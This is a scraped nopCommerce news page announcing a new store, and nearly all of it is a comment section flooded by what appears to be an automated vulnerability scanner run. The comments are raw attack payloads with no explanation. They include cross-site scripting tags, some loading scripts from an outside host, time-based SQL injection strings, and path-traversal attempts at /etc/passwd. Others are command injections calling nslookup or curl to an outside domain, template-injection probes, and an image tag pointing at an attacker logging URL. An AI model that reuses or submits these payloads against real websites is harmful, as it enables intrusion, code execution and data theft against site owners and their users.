News

Filter

The new nopCommerce store is open now

Thursday, February 1, 2024

The new nopCommerce store is open now

Leave your comment
*
*
Comments
8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

)

8/18/2025 4:56 PM
Mr.

!(()&&!|*|*|

8/18/2025 4:56 PM
Mr.

^(#$!@#$)(()))******

8/18/2025 4:56 PM
)

555

8/18/2025 4:56 PM
!(()&&!|*|*|

555

8/18/2025 4:56 PM
^(#$!@#$)(()))******

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

redirtest.acx

8/18/2025 4:56 PM
redirtest.acx

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555<esi:include src="http://bxss.me/rpb.png"/>

8/18/2025 4:56 PM
Mr.<esi:include src="http://bxss.me/rpb.png"/>

555

8/18/2025 4:56 PM
Mr.

../../../../../../../../../../../../../../etc/passwd

8/18/2025 4:56 PM
Mr.

'"()

8/18/2025 4:56 PM
Mr.

../../../../../../../../../../../../../../windows/win.ini

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555'&&sleep(27*1000)*nxjdyx&&'

8/18/2025 4:56 PM
Mr.

file:///etc/passwd

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555"&&sleep(27*1000)*vqnaby&&"

8/18/2025 4:56 PM
Mr.

${9999304+9999513}

8/18/2025 4:56 PM
Mr.

../555

8/18/2025 4:56 PM
Mr.

555'||sleep(27*1000)*ylhjsv||'

8/18/2025 4:56 PM
${9999270+9999151}

555

8/18/2025 4:56 PM
../../../../../../../../../../../../../../etc/passwd

555

8/18/2025 4:56 PM
Mr.

555"||sleep(27*1000)*urmxfh||"

8/18/2025 4:56 PM
../../../../../../../../../../../../../../windows/win.ini

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
file:///etc/passwd

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

8/18/2025 4:56 PM
../Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
/../../../../../../../../../../windows/system32/BITSADMIN.exe

555

8/18/2025 4:56 PM
Mr.

echo qybxje$()\ qikoxi\nz^xyu||a #' &echo qybxje$()\ qikoxi\nz^xyu||a #|" &echo qybxje$()\ qikoxi\nz^xyu||a #

8/18/2025 4:56 PM
Mr.

&echo xmfwgd$()\ dwblej\nz^xyu||a #' &echo xmfwgd$()\ dwblej\nz^xyu||a #|" &echo xmfwgd$()\ dwblej\nz^xyu||a #

8/18/2025 4:56 PM
Mr.

555&echo wydcqn$()\ auagcd\nz^xyu||a #' &echo wydcqn$()\ auagcd\nz^xyu||a #|" &echo wydcqn$()\ auagcd\nz^xyu||a #

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

|echo oyroaj$()\ qiolxc\nz^xyu||a #' |echo oyroaj$()\ qiolxc\nz^xyu||a #|" |echo oyroaj$()\ qiolxc\nz^xyu||a #

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
'"()

555

8/18/2025 4:56 PM
Mr.

555|echo zyufal$()\ lbrhaw\nz^xyu||a #' |echo zyufal$()\ lbrhaw\nz^xyu||a #|" |echo zyufal$()\ lbrhaw\nz^xyu||a #

8/18/2025 4:56 PM
Mr.

"+"A".concat(70-3).concat(22*4).concat(108).concat(85).concat(97).concat(71)+(require"socket"
Socket.gethostbyname("hitcz"+"nligklcj3730a.bxss.me.")[3].to_s)+"

8/18/2025 4:56 PM
Mr.'&&sleep(27*1000)*ddcpky&&'

555

8/18/2025 4:56 PM
Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

8/18/2025 4:56 PM
Mr.

expr 9000276035 - 986550

8/18/2025 4:56 PM
Mr.

'+'A'.concat(70-3).concat(22*4).concat(117).concat(90).concat(103).concat(73)+(require'socket'
Socket.gethostbyname('hitnz'+'chsspiox67a1d.bxss.me.')[3].to_s)+'

8/18/2025 4:56 PM
Mr.

(nslookup -q=cname hitrceazhuzhu0910c.bxss.me||curl hitrceazhuzhu0910c.bxss.me))

8/18/2025 4:56 PM
Mr."&&sleep(27*1000)*iqflrh&&"

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

'A'.concat(70-3).concat(22*4).concat(120).concat(85).concat(97).concat(65)+(require'socket'
Socket.gethostbyname('hitmu'+'slrtpjqa26684.bxss.me.')[3].to_s)

8/18/2025 4:56 PM
Mr.

/etc/shells

8/18/2025 4:56 PM
Mr.

$(nslookup -q=cname hitknyhpgdacsc7dd6.bxss.me||curl hitknyhpgdacsc7dd6.bxss.me)

8/18/2025 4:56 PM
Mr.'||sleep(27*1000)*bjkxxo||'

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
"+"A".concat(70-3).concat(22*4).concat(103).concat(81).concat(119).concat(87)+(require"socket" Socket.gethostbyname("hitcq"+"egjvqjbk15263.bxss.me.")[3].to_s)+"

555

8/18/2025 4:56 PM
Mr.

&nslookup -q=cname hiteirqpgaglh764c5.bxss.me&'\"`0&nslookup -q=cname hiteirqpgaglh764c5.bxss.me&`'

8/18/2025 4:56 PM
Mr.

../../../../../../../../../../../../../../etc/shells

8/18/2025 4:56 PM
Mr."||sleep(27*1000)*vwvrtp||"

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
'+'A'.concat(70-3).concat(22*4).concat(122).concat(77).concat(120).concat(72)+(require'socket' Socket.gethostbyname('hitlh'+'cxzjuhqae5ea0.bxss.me.')[3].to_s)+'

555

8/18/2025 4:56 PM
Mr.

&(nslookup -q=cname hitxthozqndcm7f3b1.bxss.me||curl hitxthozqndcm7f3b1.bxss.me)&'\"`0&(nslookup -q=cname hitxthozqndcm7f3b1.bxss.me||curl hitxthozqndcm7f3b1.bxss.me)&`'

8/18/2025 4:56 PM
Mr.

c:/windows/win.ini

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

8/18/2025 4:56 PM
Mr.

|(nslookup -q=cname hitrfbrwmiaxqc2356.bxss.me||curl hitrfbrwmiaxqc2356.bxss.me)

8/18/2025 4:56 PM
'A'.concat(70-3).concat(22*4).concat(102).concat(76).concat(97).concat(88)+(require'socket' Socket.gethostbyname('hituy'+'kcvnpylcdf910.bxss.me.')[3].to_s)

555

8/18/2025 4:56 PM
Mr.

bxss.me

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

';print(md5(31337));$a='

8/18/2025 4:56 PM
Mr.

`(nslookup -q=cname hituabssodwem3647e.bxss.me||curl hituabssodwem3647e.bxss.me)`

8/18/2025 4:56 PM
Mr.

Http://bxss.me/t/fit.txt

8/18/2025 4:56 PM
Mr.

;(nslookup -q=cname hitdpiiwbjclw15832.bxss.me||curl hitdpiiwbjclw15832.bxss.me)|(nslookup -q=cname hitdpiiwbjclw15832.bxss.me||curl hitdpiiwbjclw15832.bxss.me)&(nslookup -q=cname hitdpiiwbjclw15832.bxss.me||curl hitdpiiwbjclw15832.bxss.me)

8/18/2025 4:56 PM
Mr.

";print(md5(31337));$a="

8/18/2025 4:56 PM
Mr.

http://bxss.me/t/fit.txt?.jpg

8/18/2025 4:56 PM
Mr.

|(nslookup${IFS}-q${IFS}cname${IFS}hitakuqltaevsa5210.bxss.me||curl${IFS}hitakuqltaevsa5210.bxss.me)

8/18/2025 4:56 PM
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

555

8/18/2025 4:56 PM
Mr.

&(nslookup${IFS}-q${IFS}cname${IFS}hitvdsbroglfy7b039.bxss.me||curl${IFS}hitvdsbroglfy7b039.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvdsbroglfy7b039.bxss.me||curl${IFS}hitvdsbroglfy7b039.bxss.me)&`'

8/18/2025 4:56 PM
Mr.

HttP://bxss.me/t/xss.html?%00

8/18/2025 4:56 PM
Mr.

${@print(md5(31337))}

8/18/2025 4:56 PM
echo wdhtey$()\ hzcuro\nz^xyu||a #' &echo wdhtey$()\ hzcuro\nz^xyu||a #|" &echo wdhtey$()\ hzcuro\nz^xyu||a #

555

8/18/2025 4:56 PM
Mr.

bxss.me/t/xss.html?%00

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

${@print(md5(31337))}\

8/18/2025 4:56 PM
&echo xyhwwf$()\ duiqeg\nz^xyu||a #' &echo xyhwwf$()\ duiqeg\nz^xyu||a #|" &echo xyhwwf$()\ duiqeg\nz^xyu||a #

555

8/18/2025 4:56 PM
/etc/shells

555

8/18/2025 4:56 PM
Mr.

'.print(md5(31337)).'

8/18/2025 4:56 PM
HttP://bxss.me/t/xss.html?%00

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.&echo tapogz$()\ kzgumr\nz^xyu||a #' &echo tapogz$()\ kzgumr\nz^xyu||a #|" &echo tapogz$()\ kzgumr\nz^xyu||a #

555

8/18/2025 4:56 PM
../../../../../../../../../../../../../../etc/shells

555

8/18/2025 4:56 PM
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

8/18/2025 4:56 PM
bxss.me/t/xss.html?%00

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
|echo rlvaih$()\ hbgngy\nz^xyu||a #' |echo rlvaih$()\ hbgngy\nz^xyu||a #|" |echo rlvaih$()\ hbgngy\nz^xyu||a #

555

8/18/2025 4:56 PM
c:/windows/win.ini

555

8/18/2025 4:56 PM
';print(md5(31337));$a='

555

8/18/2025 4:56 PM
Mr.|echo lpqxns$()\ wmtklu\nz^xyu||a #' |echo lpqxns$()\ wmtklu\nz^xyu||a #|" |echo lpqxns$()\ wmtklu\nz^xyu||a #

555

8/18/2025 4:56 PM
bxss.me

555

8/18/2025 4:56 PM
expr 9000162954 - 926878

555

8/18/2025 4:56 PM
Http://bxss.me/t/fit.txt

555

8/18/2025 4:56 PM
";print(md5(31337));$a="

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
${@print(md5(31337))}

555

8/18/2025 4:56 PM
http://bxss.me/t/fit.txt?.

555

8/18/2025 4:56 PM
(nslookup -q=cname hitypfthnjwhi3e1a8.bxss.me||curl hitypfthnjwhi3e1a8.bxss.me))

555

8/18/2025 4:56 PM
Mr.

NewsCommentAdd

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
${@print(md5(31337))}\

555

8/18/2025 4:56 PM
$(nslookup -q=cname hithmkyukuewb61690.bxss.me||curl hithmkyukuewb61690.bxss.me)

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
'.print(md5(31337)).'

555

8/18/2025 4:56 PM
&nslookup -q=cname hitkwavqkmjmt72797.bxss.me&'\"`0&nslookup -q=cname hitkwavqkmjmt72797.bxss.me&`'

555

8/18/2025 4:56 PM
Mr.

NewsCommentAdd/.

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
&(nslookup -q=cname hitrnhixjyxqp1eca0.bxss.me||curl hitrnhixjyxqp1eca0.bxss.me)&'\"`0&(nslookup -q=cname hitrnhixjyxqp1eca0.bxss.me||curl hitrnhixjyxqp1eca0.bxss.me)&`'

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
|(nslookup -q=cname hittefruthebmb6663.bxss.me||curl hittefruthebmb6663.bxss.me)

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
`(nslookup -q=cname hitwsgtkjhpzcfff68.bxss.me||curl hitwsgtkjhpzcfff68.bxss.me)`

555

8/18/2025 4:56 PM
NewsCommentAdd

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
NewsCommentAdd/.

555

8/18/2025 4:56 PM
|(nslookup${IFS}-q${IFS}cname${IFS}hithotuxaxipybaf24.bxss.me||curl${IFS}hithotuxaxipybaf24.bxss.me)

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

'.gethostbyname(lc('hitaf'.'awazwdwe25a68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(73).chr(98).chr(71).'

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

".gethostbyname(lc("hitnf"."fnoezyqd0cf11.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(73).chr(103).chr(66)."

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

gethostbyname(lc('hituw'.'svafbmfc12cf7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(73).chr(109).chr(88)

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
'.gethostbyname(lc('hitym'.'lvvrgfzs18f45.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(83).chr(102).chr(74).'

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:56 PM
Mr.

555'"()&%<zzz><ScRiPt >9tAL(9709)</ScRiPt>

8/18/2025 4:56 PM
".gethostbyname(lc("hitgy"."kkkdzpflb699a.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(73).chr(99).chr(77)."

555

8/18/2025 4:56 PM
Mr.

555

8/18/2025 4:57 PM
gethostbyname(lc('hitce'.'tfzyliou75ade.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(78).chr(98).chr(77)

555

8/18/2025 4:57 PM
Mr.

'"

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

<!--

8/18/2025 4:57 PM
'"

555

8/18/2025 4:57 PM
Mr.

'"()&%<zzz><ScRiPt >9tAL(9439)</ScRiPt>

8/18/2025 4:57 PM
<!--

555

8/18/2025 4:57 PM
Mr.

response.write(9112582*9534144)

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

'+response.write(9112582*9534144)+'

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

"+response.write(9112582*9534144)+"

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

5559643674

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

<% response.write(9112582*9534144) %>

8/18/2025 4:57 PM
Mr.

+response.write(9112582*9534144)'

8/18/2025 4:57 PM
response.write(9627870*9924801)

555

8/18/2025 4:57 PM
'+response.write(9627870*9924801)+'

555

8/18/2025 4:57 PM
Mr.

bfg3331<s1﹥s2ʺs3ʹhjl3331

8/18/2025 4:57 PM
"+response.write(9627870*9924801)+"

555

8/18/2025 4:57 PM
<% response.write(9627870*9924801) %>

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
+response.write(9627870*9924801)'

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

bfgx7560%C0%BEz1%C0%BCz2a%90bcxhjl7560

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

<%={{={@{#{${dfb}}%>

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

<th:t="${dfb}#foreach

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

555

8/18/2025 4:57 PM
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

8/18/2025 4:57 PM
Mr.

dfb{{98991*97996}}xca

8/18/2025 4:57 PM
Mr.

dfb[[${98991*97996}]]xca

8/18/2025 4:57 PM
Mr.

dfb__${98991*97996}__::.x

8/18/2025 4:57 PM
Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

8/18/2025 4:57 PM
Mr.

555<ScRiPt >9tAL(9318)</ScRiPt>

8/18/2025 4:57 PM
Mr.

555<WXXSEP>BERDH[!+!]</WXXSEP>

8/18/2025 4:57 PM
Mr.

555<script>9tAL(9875)</script>

8/18/2025 4:57 PM
Mr.

555<script>9tAL(9638)</script>9638

8/18/2025 4:57 PM
Mr.

555<ScR<ScRiPt>IpT>9tAL(9064)</sCr<ScRiPt>IpT>

8/18/2025 4:57 PM
Mr.

555<ScRiPt
>9tAL(9062)</ScRiPt>

8/18/2025 4:57 PM
Mr.

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9030></ScRiPt>

8/18/2025 4:57 PM
Mr.

555<isindex type=image src=1 onerror=9tAL(9182)>

8/18/2025 4:57 PM
Mr.

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9808'>

8/18/2025 4:57 PM
Mr.

555<body onload=9tAL(9161)>

8/18/2025 4:57 PM
Mr.

555<img src=//xss.bxss.me/t/dot.gif onload=9tAL(9430)>

8/18/2025 4:57 PM
Mr.

555<img src=xyz OnErRor=9tAL(9723)>

8/18/2025 4:57 PM
Mr.

555<img/src=">" onerror=alert(9553)>

8/18/2025 4:57 PM
Mr.

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%74%41%4C%289052%29%3C%2F%73%43%72%69%70%54%3E

8/18/2025 4:57 PM
Mr.

555\u003CScRiPt\9tAL(9588)\u003C/sCripT\u003E

8/18/2025 4:57 PM
Mr.

555&lt;ScRiPt&gt;9tAL(9471)&lt;/sCripT&gt;

8/18/2025 4:57 PM
Mr.

%F6<img zzz onmouseover=9tAL(90821) //%F6>

8/18/2025 4:57 PM
Mr.

555<input autofocus onfocus=9tAL(9725)>

8/18/2025 4:57 PM
Mr.

<a HrEF=http://xss.bxss.me></a>

8/18/2025 4:57 PM
Mr.

<a HrEF=jaVaScRiPT:>

8/18/2025 4:57 PM
Mr.

555}body{zzz:Expre/**/SSion(9tAL(9209))}

8/18/2025 4:57 PM
Mr.

555kiKXQ
<ScRiPt >9tAL(9016)</ScRiPt>

8/18/2025 4:58 PM
Mr.

555<WMRABV>0ADIN[!+!]</WMRABV>

8/18/2025 4:58 PM
Mr.

555<ifRAme sRc=9910.com></IfRamE>

8/18/2025 4:58 PM
Mr.

555<aU3hVpM x=9378>

8/18/2025 4:58 PM
Mr.

555<img sRc='http://attacker-9884/log.php?

8/18/2025 4:58 PM
Mr.

555<aBwUWkP<

8/18/2025 4:58 PM
Mr.'"()&%<zzz><ScRiPt >9tAL(9352)</ScRiPt>

555

8/18/2025 4:58 PM
'"()&%<zzz><ScRiPt >9tAL(9371)</ScRiPt>

555

8/18/2025 4:58 PM
Mr.9339875

555

8/18/2025 4:58 PM
bfg7015<s1﹥s2ʺs3ʹhjl7015

555

8/18/2025 4:58 PM
bfgx6525%C0%BEz1%C0%BCz2a%90bcxhjl6525

555

8/18/2025 4:58 PM
<%={{={@{#{${dfb}}%>

555

8/18/2025 4:58 PM
<th:t="${dfb}#foreach

555

8/18/2025 4:58 PM
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

8/18/2025 4:58 PM
dfb{{98991*97996}}xca

555

8/18/2025 4:58 PM
dfb[[${98991*97996}]]xca

555

8/18/2025 4:58 PM
dfb__${98991*97996}__::.x

555

8/18/2025 4:58 PM
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

8/18/2025 4:58 PM
Mr.<ScRiPt >9tAL(9451)</ScRiPt>

555

8/18/2025 4:58 PM
Mr.<WMQL8V>KSEEG[!+!]</WMQL8V>

555

8/18/2025 4:58 PM
Mr.<script>9tAL(9481)</script>

555

8/18/2025 4:58 PM
Mr.<script>9tAL(9922)</script>9922

555

8/18/2025 4:58 PM
Mr.<ScR<ScRiPt>IpT>9tAL(9735)</sCr<ScRiPt>IpT>

555

8/18/2025 4:58 PM
Mr.<ScRiPt >9tAL(9130)</ScRiPt>

555

8/18/2025 4:58 PM
Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9062></ScRiPt>

555

8/18/2025 4:58 PM
Mr.<isindex type=image src=1 onerror=9tAL(9583)>

555

8/18/2025 4:58 PM
Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9580'>

555

8/18/2025 4:58 PM
Mr.<body onload=9tAL(9464)>

555

8/18/2025 4:58 PM
Mr.<img src=//xss.bxss.me/t/dot.gif onload=9tAL(9484)>

555

8/18/2025 4:58 PM
Mr.<img src=xyz OnErRor=9tAL(9152)>

555

8/18/2025 4:58 PM
Mr.<img/src=">" onerror=alert(9537)>

555

8/18/2025 4:58 PM
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%39%74%41%4C%289915%29%3C%2F%73%43%72%69%70%54%3E

555

8/18/2025 4:58 PM
Mr.\u003CScRiPt\9tAL(9605)\u003C/sCripT\u003E

555

8/18/2025 4:58 PM
Mr.&lt;ScRiPt&gt;9tAL(9798)&lt;/sCripT&gt;

555

8/18/2025 4:58 PM
%F6<img zzz onmouseover=9tAL(98811) //%F6>

555

8/18/2025 4:58 PM
Mr.<input autofocus onfocus=9tAL(9883)>

555

8/18/2025 4:58 PM
<a HrEF=http://xss.bxss.me></a>

555

8/18/2025 4:58 PM
<a HrEF=jaVaScRiPT:>

555

8/18/2025 4:59 PM
Mr.}body{zzz:Expre/**/SSion(9tAL(9968))}

555

8/18/2025 4:59 PM
Mr.sDck3 <ScRiPt >9tAL(9776)</ScRiPt>

555

8/18/2025 4:59 PM
Mr.<WOC1KK>PNBU7[!+!]</WOC1KK>

555

8/18/2025 4:59 PM
Mr.<ifRAme sRc=9300.com></IfRamE>

555

8/18/2025 4:59 PM
Mr.<aDCD70C x=9610>

555

8/18/2025 4:59 PM
Mr.<img sRc='http://attacker-9111/log.php?

555

8/18/2025 4:59 PM
Mr.<a4mUmuf<

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

555

8/18/2025 4:59 PM
Mr.

-1 OR 5*5=25 --

8/18/2025 4:59 PM
Mr.

-1 OR 5*5=25

8/18/2025 4:59 PM
Mr.

-1' OR 5*5=25 --

8/18/2025 4:59 PM
Mr.

-1" OR 5*5=25 --

8/18/2025 4:59 PM
Mr.

-1' OR 5*5=25 or 'QDwRHJ8f'='

8/18/2025 4:59 PM
Mr.

-1" OR 5*5=25 or "eNgdpwmP"="

8/18/2025 4:59 PM
Mr.

555*if(now()=sysdate(),sleep(15),0)

8/18/2025 4:59 PM
Mr.

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

8/18/2025 4:59 PM
Mr.

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

8/18/2025 5:00 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

8/18/2025 5:00 PM
Mr.

555-1; waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555-1); waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555-1)); waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555-1 waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555d5StYdIk'; waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555aRzGvAZN'); waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555UGBxpTsZ')); waitfor delay '0:0:15' --

8/18/2025 5:00 PM
Mr.

555-1 OR 485=(SELECT 485 FROM PG_SLEEP(15))--

8/18/2025 5:00 PM
Mr.

555-1) OR 212=(SELECT 212 FROM PG_SLEEP(15))--

8/18/2025 5:01 PM
Mr.

555-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--

8/18/2025 5:01 PM
Mr.

5557RbKYDno' OR 494=(SELECT 494 FROM PG_SLEEP(15))--

8/18/2025 5:01 PM
Mr.

555Xa25gWDP') OR 647=(SELECT 647 FROM PG_SLEEP(15))--

8/18/2025 5:01 PM
Mr.

555rs8vUoXz')) OR 580=(SELECT 580 FROM PG_SLEEP(15))--

8/18/2025 5:01 PM
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

8/18/2025 5:01 PM
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

8/18/2025 5:01 PM
Mr.

555

8/18/2025 5:01 PM
Mr.

555'"

8/18/2025 5:01 PM
Mr.

555%C0%A7%C0%A2%2527%2522\'\"

8/18/2025 5:02 PM
Mr.

@@jzukj

8/18/2025 5:02 PM
Mr.

(select 198766*667891)

8/18/2025 5:02 PM
Mr.

(select 198766*667891 from DUAL)

8/18/2025 5:02 PM
Mr.

555

8/18/2025 5:02 PM
Mr.

555

8/18/2025 5:02 PM
-1 OR 5*5=25 --

555

8/18/2025 5:02 PM
-1 OR 5*5=25

555

8/18/2025 5:02 PM
-1' OR 5*5=25 --

555

8/18/2025 5:02 PM
-1" OR 5*5=25 --

555

8/18/2025 5:02 PM
-1' OR 5*5=25 or 'h4PuNcpk'='

555

8/18/2025 5:02 PM
-1" OR 5*5=25 or "RqUo2UN4"="

555

8/18/2025 5:02 PM
if(now()=sysdate(),sleep(15),0)

555

8/18/2025 5:02 PM
Mr.0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

8/18/2025 5:02 PM
Mr.0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

8/18/2025 5:03 PM
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

8/18/2025 5:03 PM
Mr.-1; waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.-1); waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.-1 waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.eKc80jYN'; waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.4SNjkxRU'); waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.K6nTqKjS')); waitfor delay '0:0:15' --

555

8/18/2025 5:03 PM
Mr.tvuXCZaQ' OR 628=(SELECT 628 FROM PG_SLEEP(15))--

555

8/18/2025 5:03 PM
Mr.FjTBfuhY') OR 686=(SELECT 686 FROM PG_SLEEP(15))--

555

8/18/2025 5:03 PM
Mr.TdmjAHs9')) OR 364=(SELECT 364 FROM PG_SLEEP(15))--

555

8/18/2025 5:03 PM
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

8/18/2025 5:04 PM
Mr.

555

8/18/2025 5:04 PM
Mr.'"

555

8/18/2025 5:04 PM
Mr.%C0%A7%C0%A2%2527%2522\'\"

555

8/18/2025 5:04 PM
@@vKzFY

555

8/18/2025 5:04 PM
(select 198766*667891)

555

8/18/2025 5:04 PM
(select 198766*667891 from DUAL)

555

8/18/2025 5:04 PM
Mr.

555

8/18/2025 5:04 PM
Mr.

555

8/18/2025 5:06 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:07 PM
Mr.

555

8/18/2025 5:08 PM
Mr.

555

8/18/2025 5:08 PM
Mr.

555

8/18/2025 5:08 PM
Mr.

555

8/18/2025 5:09 PM
Mr.

555

8/18/2025 5:09 PM
Mr.

555

8/18/2025 5:09 PM
Mr.

555

8/18/2025 5:10 PM
Mr.

555

8/18/2025 5:10 PM
Mr.

555

8/18/2025 5:10 PM
Mr.

555

8/18/2025 5:10 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
Mr.

555

8/18/2025 5:11 PM
